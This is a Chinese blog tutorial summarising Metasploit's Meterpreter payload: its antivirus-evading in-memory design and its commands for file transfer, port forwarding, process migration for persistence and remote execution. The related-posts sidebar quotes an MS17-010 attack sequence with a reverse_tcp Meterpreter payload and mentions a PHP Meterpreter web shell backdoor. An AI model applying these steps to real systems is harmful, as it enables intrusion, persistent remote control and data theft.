Meterpreter使用总结(1)

最新推荐文章于 2024-06-05 17:44:32 发布
最新推荐文章于 2024-06-05 17:44:32 发布
阅读量2.1w 收藏 47
点赞数 7
分类专栏: metasploit 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34841823/article/details/54926500
版权

meterpreter是我最喜欢使用的攻击payload,经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试,下面就meterpreter的基本使用进行一个总结:

(1)meterpreter的技术优势:


1.平台通用性


2.纯内存工作模式,执行漏洞渗透攻击的时候么会直接装载meterpreter的动态链接库到目标进程的空间中。这样使得meterpreter启动隐蔽,很难被杀毒软件检测到


3.灵活且加密的通信协议


4.易于扩展


(2)meterpreter的基本命令:


获得meterpreter的shell之后可以通过输入?来获取meterpreter的基本命令介绍:

下面就简单介绍几个不熟悉的命令:

1.getwd命令:可以获取当前目标机器的工作目录,也可以获得当前系统的工作目录:

2.upload命令:可以上传文件或文件夹到目标机器:

3.download命令:从目标机器上下载文件夹或者文件到攻击机:

4.search命令:支持对远程目标机器上的文件进行搜索:

5.portfwd命令:这个是meterpreter内嵌的端口转发器,一般在目标主机开放的端口不允许直接访问的情况下使用;比如当目标主机开放的远程桌面3389端口只允许内网访问,这是可以使用portfwd命令进行端口转发,已达到直接访问目标主机的目的。

这样就把远程主机的3389的端口映射到本机的1235号端口,之后通过rdesktop就可以访问本机1235号端口来访问远程主机的3389号端口。

6.route命令:可以查看路由

7.ps命令可以用来获取目标主机上正在运行的进程信息:

8.migrate命令,将当前meterpreter会话从一个进程移植到另外一个进程的内存空间中,

通过ps命令可以看到QQ.exe的pid是10652


然后用migrate命令,将会话移植到qq.exe这样,只要qq一直运行,当前的meterpreter会话就不会中断。常常利用此命令将meterpreter移植到一些一直不会关闭的进程中,可以最大程度的保证meterpreter的寿命。

9.execute命令:可以在目标机中执行文件



TravisZeng
关注
  • 7
    点赞
  • 47
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
metepreter命令
sunshine19871211的博客
04-14 1000
https://xz.aliyun.com/t/2536 meterpreter后渗透命令 background 将会话切换到后台 sessions -l sessions -i 2 启动一个shell或一个meterpreter sessions -k 2 杀死shell upload /root/桌面/payload.txt c: edit payload.txt cat ls c: ...
PHP Meterpreter后门
Admin_Shell的博客
02-24 1569
Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP Web shell。利用目标的漏洞(常见的注入和上传漏洞)之后,再把它的shell传到目标主机即可。 实验环境 系统:Kali2019 iP地址:192.168.1.15 使用工具: PHP Meterpreter **目标主机 系统:Windows2008 iP地...
meterpreter > migrate 1548
weixin_30271335的博客
11-20 94
1548 1500 explorer.exe x86 0 LIXIULI-VCS86VR\test C:\WINDOWS\Explorer.EXE 1944 1548 vmtoolsd.exe x86 0 LIXIULI-VCS86VR\test C:\Program Files\VMware\VMware To...
metersphere 上传和下载接口上传文件参数化及下载文件校验
最新发布
mmy的博客
06-05 509
整体思路:首先编写下载用例(使用浏览器下载的请求url),配置后置操作将下载文件输出到指定文件中,配置脚本断言规则,读取下载文件内容然后进行校验。测试上传类型接口时,有时需要从前置用例中获取文件中的内容参数写入文件中后再进行上传接口调用,也就是说我想要随时改变上传文件的内容。对于一些下载接口需要对下载的文件内容做校验,如何模拟浏览器下载操作获得下载文件及内容呢。通过前置操作获取到上传的文件,然后修改文件内的内容,从而实现动态改变文件内容的目的。其中file_name是需要保存的文件路径,可自定义。
Meterpreter命令详解
weixin_45605352的博客
04-18 4946
0x01初识Meterpreter 1.1.什么是Meterpreter    Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 843
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
meterpreter模块之后渗透攻击实战总结.docx
07-10
1. **进程迁移**:在Meterpreter中,进程迁移是保护会话不被检测或杀毒软件清除的关键技巧。首先,通过`ps`命令列出目标主机上的所有进程,然后用`getpid`获取当前Meterpreter shell所属的进程ID。接着,使用`...
0x04.第四课 Meterpreter的介绍与使用.pdf
06-24
### Meterpreter介绍与使用 #### 一、Meterpreter概述 Meterpreter是Metasploit框架中的一个重要组成部分,作为攻击载荷使用,在成功利用漏洞后能够为攻击者提供对目标系统的控制通道。这一模块允许攻击者执行一...
CSB答辩ppt,1内容总结2 学习心得3课外拓展
03-20
MS17-010漏洞复现 Meterpreter后渗透 MS08-067 漏洞复现 跨网段攻击 MSF恶意程序利用 暴力破解(low、medium、high) Web渗透测试实战-SQL注入(low) web渗透测试实战-SQLMAP web渗透测试实战-文件上传
记一份SQLmap 使用手册小结(二)1
08-03
5. **Meterpreter配合使用**: SQLmap可以建立TCP连接到攻击者的机器,创建一个Meterpreter会话。这涉及以下几种方式: - `--os-pwn`:通过sys_bineval()函数在内存中执行Metasploit的shellcode。 - 上传独立...
永恒之蓝(ms17-010)&&meterpreter模块简单使用
Z_l123的博客
03-09 1382
永恒之蓝(ms17-010) 启动meterpreter msfconsole 查询ms17-010,并使用攻击模块 search ms17-010 use 3 设置目标ip,本机ip,payload set rhosts 192.168.254.130 set lhost 192.168.254.129 set payload windows/x64/meterpreter/reverse_tcp 查看配置 show options 开始攻击 run ...
meterpreter模块
qq_52712762的博客
05-21 519
meterpreter
详尽的msf——meterpreter——渗透测试教程
m0_61101264的博客
11-02 386
本文仅供学习参考使用,切勿用于非法事情!!众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。现在发现msf很厉害,可以在它的基础上开发。msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期控守(推塔)我们可以在msfconsole上,开发自己的程序(用自己的英雄),程序可以利用msf中的模块(用它的装备)Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。
后渗透之文件系统+上传下载文件
qq_51550750的博客
06-27 1652
MSF后渗透 文件系统,文件的上传和下载
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3847
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
Meterpreter基本命令详解
小人物的博客
05-14 2717
基本命令 1.background 命令 &amp;nbsp;&amp;nbsp; 将Meterpreter终端隐藏在后台 2.sessions 命令 &amp;nbsp;&amp;nbsp;查看已经成功获取的会话 3.quit 命令 &amp;nbsp;&amp;nbsp; 直接关闭当前的Meterpreter命令 4.shell 命令 &amp;nbsp;&amp;nbsp;可以获取系统的控制台Shell,如果目标系统上的命
Metasploit--后渗透--上传/下载文件
千寻的博客
02-18 8183
upload file 命令则能够向目标系统上传文件。 download file 命令可以帮助我们从目标系统中下载文件
meterpreter
06-06
Meterpreter是一个强大的后渗透框架,是Metasploit渗透测试框架中的一个模块,它提供了一个交互式的命令行接口,可以在受害者计算机上执行各种操作,包括文件系统操作、网络操作、系统管理等。Meterpreter模块可以在多种操作系统上运行,包括Windows、Linux、Mac OS X等。它通常被用来进行后渗透测试,获取受害者计算机的控制权,并执行各种攻击操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值